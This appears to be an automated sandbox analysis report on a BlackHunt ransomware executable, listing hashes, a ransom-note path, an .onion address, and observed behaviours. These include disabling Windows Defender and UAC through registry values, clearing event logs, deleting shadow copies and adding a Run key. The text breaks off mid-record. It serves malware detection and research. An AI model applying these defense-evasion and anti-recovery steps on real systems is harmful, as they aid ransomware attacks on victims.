Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
133s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:18
Static task
static1
Behavioral task
behavioral1
Sample
4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe
Resource
win10v2004-20231215-en
General
-
Target
4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe
-
Size
707KB
-
MD5
0a75791ce95a8f2162fb9435b7a89d6d
-
SHA1
0a78694d54d25f05f0e0fdd4669537778475fd63
-
SHA256
4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b
-
SHA512
d6f7c96f593debfaea9903b2112d9cd58c440ddbd149a8c357106a8c0f53d2c75cd943eef8bd18d2cac53664002e6646caad9a258b1088fac6088915980a4b77
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1784vnh:6uaTmkZJ+naie5OTamgEoKxLWqGh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 7556 fsutil.exe 7080 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 6752 wevtutil.exe 2432 wevtutil.exe 7532 wevtutil.exe 7076 wevtutil.exe 432 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 8264 bcdedit.exe 5972 bcdedit.exe 7584 bcdedit.exe 4644 bcdedit.exe -
Renames multiple (3369) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 7632 wbadmin.exe 1964 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\X: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\V: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\I: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\S: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\N: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\E: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\A: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\J: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\L: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\W: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\U: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\P: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\R: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\G: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\H: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\K: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\B: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\M: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\T: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened (read-only) \??\Y: 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\#BlackHunt_ReadMe.hta 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\#BlackHunt_ReadMe.hta 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\#BlackHunt_Private.key 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\editpdf-tool-view.js 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-tw\ui-strings.js 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\#BlackHunt_ReadMe.txt 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\plugins.js 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sk-sk\#BlackHunt_ReadMe.hta 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\#BlackHunt_ReadMe.hta 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\#BlackHunt_ReadMe.txt 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\cs-cz\#BlackHunt_ReadMe.txt 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\#BlackHunt_Private.key 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\scanAppLogo.png 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\file_icons.png 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons_retina.png 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\bg_patterns_header.png 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-tw\#BlackHunt_Private.key 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\ui-strings.js 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\ui-strings.js 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ar-ae\#BlackHunt_ReadMe.txt 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\root\#BlackHunt_ReadMe.hta 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#BlackHunt_ReadMe.txt 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\MoreTools.aapp 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\#BlackHunt_ReadMe.hta 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\ui-strings.js 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ar_get.svg 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files\Java\jre-1.8\lib\applet\#BlackHunt_Private.key 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#BlackHunt_ReadMe.txt 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\#BlackHunt_Private.key 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\ui-strings.js 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\#BlackHunt_ReadMe.hta 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\plugin.js 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\example_icons.png 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ca-es\ui-strings.js 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\welcome-2x.png 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\da-dk\ui-strings.js 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\vlc.mo 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ui-strings.js 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\#BlackHunt_ReadMe.txt 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-ae\#BlackHunt_Private.key 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\main-selector.css 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\es-es\ui-strings.js 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\en-gb\#BlackHunt_ReadMe.hta 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover.png 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\tr-tr\#BlackHunt_ReadMe.hta 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\hu-hu\#BlackHunt_ReadMe.txt 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions2x.png 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\#BlackHunt_Private.key 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#BlackHunt_ReadMe.hta 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\#BlackHunt_ReadMe.hta 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\#BlackHunt_ReadMe.txt 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\#BlackHunt_ReadMe.txt 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\#BlackHunt_ReadMe.hta 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\selector.js 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\#BlackHunt_Private.key 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xerces.md 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\#BlackHunt_ReadMe.txt 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ui-strings.js 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-en_us.gif 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pt_get.svg 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ro_get.svg 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe File created C:\Program Files\VideoLAN\VLC\locale\it\#BlackHunt_ReadMe.hta 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2760 6848 WerFault.exe 292 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1732 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3704 vssadmin.exe 3224 vssadmin.exe 8864 vssadmin.exe 3796 vssadmin.exe 640 vssadmin.exe 1524 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 7760 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 7944 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe Token: SeRestorePrivilege 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe Token: SeBackupPrivilege 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe Token: SeTakeOwnershipPrivilege 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe Token: SeAuditPrivilege 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe Token: SeSecurityPrivilege 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe Token: SeIncBasePriorityPrivilege 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe Token: SeBackupPrivilege 1756 vssvc.exe Token: SeRestorePrivilege 1756 vssvc.exe Token: SeAuditPrivilege 1756 vssvc.exe Token: SeBackupPrivilege 5032 wbengine.exe Token: SeRestorePrivilege 5032 wbengine.exe Token: SeSecurityPrivilege 5032 wbengine.exe Token: SeSecurityPrivilege 7532 wevtutil.exe Token: SeBackupPrivilege 7532 wevtutil.exe Token: SeSecurityPrivilege 2432 wevtutil.exe Token: SeBackupPrivilege 2432 wevtutil.exe Token: SeSecurityPrivilege 7076 wevtutil.exe Token: SeBackupPrivilege 7076 wevtutil.exe Token: SeSecurityPrivilege 432 wevtutil.exe Token: SeBackupPrivilege 432 wevtutil.exe Token: SeSecurityPrivilege 6752 wevtutil.exe Token: SeBackupPrivilege 6752 wevtutil.exe Token: SeDebugPrivilege 7760 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1592 wrote to memory of 4168 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 89 PID 1592 wrote to memory of 4168 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 89 PID 1592 wrote to memory of 4548 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 90 PID 1592 wrote to memory of 4548 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 90 PID 1592 wrote to memory of 852 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 179 PID 1592 wrote to memory of 852 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 179 PID 1592 wrote to memory of 4464 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 95 PID 1592 wrote to memory of 4464 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 95 PID 1592 wrote to memory of 3500 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 97 PID 1592 wrote to memory of 3500 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 97 PID 1592 wrote to memory of 2828 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 99 PID 1592 wrote to memory of 2828 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 99 PID 1592 wrote to memory of 3608 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 102 PID 1592 wrote to memory of 3608 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 102 PID 1592 wrote to memory of 4432 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 101 PID 1592 wrote to memory of 4432 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 101 PID 4168 wrote to memory of 3292 4168 cmd.exe 170 PID 4168 wrote to memory of 3292 4168 cmd.exe 170 PID 1592 wrote to memory of 640 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 189 PID 1592 wrote to memory of 640 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 189 PID 4548 wrote to memory of 888 4548 cmd.exe 109 PID 4548 wrote to memory of 888 4548 cmd.exe 109 PID 852 wrote to memory of 3304 852 Conhost.exe 108 PID 852 wrote to memory of 3304 852 Conhost.exe 108 PID 4464 wrote to memory of 3264 4464 cmd.exe 110 PID 4464 wrote to memory of 3264 4464 cmd.exe 110 PID 1592 wrote to memory of 2132 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 185 PID 1592 wrote to memory of 2132 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 185 PID 3500 wrote to memory of 4208 3500 cmd.exe 111 PID 3500 wrote to memory of 4208 3500 cmd.exe 111 PID 1592 wrote to memory of 3084 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 114 PID 1592 wrote to memory of 3084 1592 4df90327d5166645c58243854c71121c46f19ffa674ccada2cdd0fde2de9b21b.exe 114 PID 2828 